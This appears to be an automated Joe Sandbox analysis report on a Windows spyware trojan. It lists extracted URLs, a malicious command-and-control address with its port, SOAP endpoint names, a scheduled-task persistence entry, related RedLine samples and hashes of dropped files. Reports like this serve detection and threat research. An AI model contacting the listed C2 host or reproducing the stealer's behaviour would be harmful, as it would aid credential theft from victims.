                    • URL Reputation: safe
                    unknown
                    https://duckduckgo.com/chrome_newtabtfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    unknown
                    https://duckduckgo.com/ac/?q=tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icotfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoustfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/CheckConnectResponsetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://185.222.57.91:55615tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003322000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.datacontract.org/2004/07/tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXtfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingstfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://ns.adobe.0/xmptfF3UBTdr8.exe, 00000009.00000002.2208269456.000000000191E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/soap/envelope/WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002E31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/Endpoint/CheckConnecttfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.ecosia.org/newtab/tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/VerifyUpdateResponsetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0tfF3UBTdr8.exe, WltfeVzR.exe.0.drfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/SetEnvironmentWltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/SetEnvironmentResponsetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/GetUpdatesWltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002E31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ac.ecosia.org/autocomplete?q= | tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.dr | false | URL Reputation: safe | unknown
                    https://api.ipify.orgcookies//settinString.Removeg | tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing | tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://tempuri.org/Endpoint/GetUpdatesResponse | tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.dr | false | URL Reputation: safe | unknown
                    http://185.222.57.91:55615t-sq | WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse | tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://tempuri.org/Endpoint/VerifyUpdate | tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://tempuri.org/0 | tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | tfF3UBTdr8.exe, 00000000.00000002.2095978320.0000000003111000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2195910209.0000000003074000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.dr | false | URL Reputation: safe | unknown
                    http://schemas.xmlsoap.org/soap/actor/next | tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    185.222.57.91 | unknown | Netherlands | | 51447 | ROOTLAYERNETNL | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1501611
                    Start date and time:2024-08-30 08:01:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:tfF3UBTdr8.exe
                    renamed because original name is a hash value
                    Original Sample Name:05211f48dbbb4ef891db1e158ff87e28.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@21/103@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 93
                    • Number of non-executed functions: 11
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    02:01:52 | API Interceptor | 37x Sleep call for process: tfF3UBTdr8.exe modified
                    02:01:59 | API Interceptor | 38x Sleep call for process: powershell.exe modified
                    02:02:03 | API Interceptor | 50x Sleep call for process: WltfeVzR.exe modified
                    08:02:00 | Task Scheduler | Run new task: WltfeVzR path: C:\Users\user\AppData\Roaming\WltfeVzR.exe
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    185.222.57.91 | rNgmoGJFYX.exe | malicious | Nanocore |
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      ROOTLAYERNETNL | 4Si6dGqcuy.exe | malicious | RedLine | 45.137.22.102
                      ROOTLAYERNETNL | lmec.exe | malicious | RedLine | 45.137.22.171
                      ROOTLAYERNETNL | CLgi.exe | malicious | RedLine | 45.137.22.169
                      ROOTLAYERNETNL | 8XYOB9Lo1C.exe | malicious | PureLog Stealer, RedLine | 45.137.22.179
                      ROOTLAYERNETNL | 5B8E6Z6ZdN.exe | malicious | RedLine | 185.222.57.81
                      ROOTLAYERNETNL | XAUnTZQny8.exe | malicious | PureLog Stealer, RedLine | 45.137.22.253
                      ROOTLAYERNETNL | Xf0VkRcuwx.exe | malicious | RedLine | 45.137.22.164
                      ROOTLAYERNETNL | SI6EttPCYd.exe | malicious | RedLine | 45.137.22.108
                      ROOTLAYERNETNL | wC3CMixoFK.exe | malicious | RedLine | 45.137.22.167
                      ROOTLAYERNETNL | 7Pr8yHjO1v.exe | malicious | RedLine | 185.222.57.151
                      No context
                      No context
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2232
                      Entropy (8bit):5.379401388151058
                      Encrypted:false
                      SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHxvIIwLgZ2KRHWLOug8s
                      MD5:AF15464AFD6EB7D301162A1DC8E01662
                      SHA1:A974B8FEC71BF837B8E72FE43AB43E447FC43A86
                      SHA-256:103A67F6744C098E5121D2D732753DFA4B54FA0EFD918FEC3941A3C052F5E211
                      SHA-512:7B5B7B7F6EAE4544BAF61F9C02BF0138950E5D7D1B0457DE2FAB2C4C484220BDD1AB42D6884838E798AD46CE1B5B5426CEB825A1690B1190857D3B643ABFAB37
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.690299109915258
                      Encrypted:false
                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
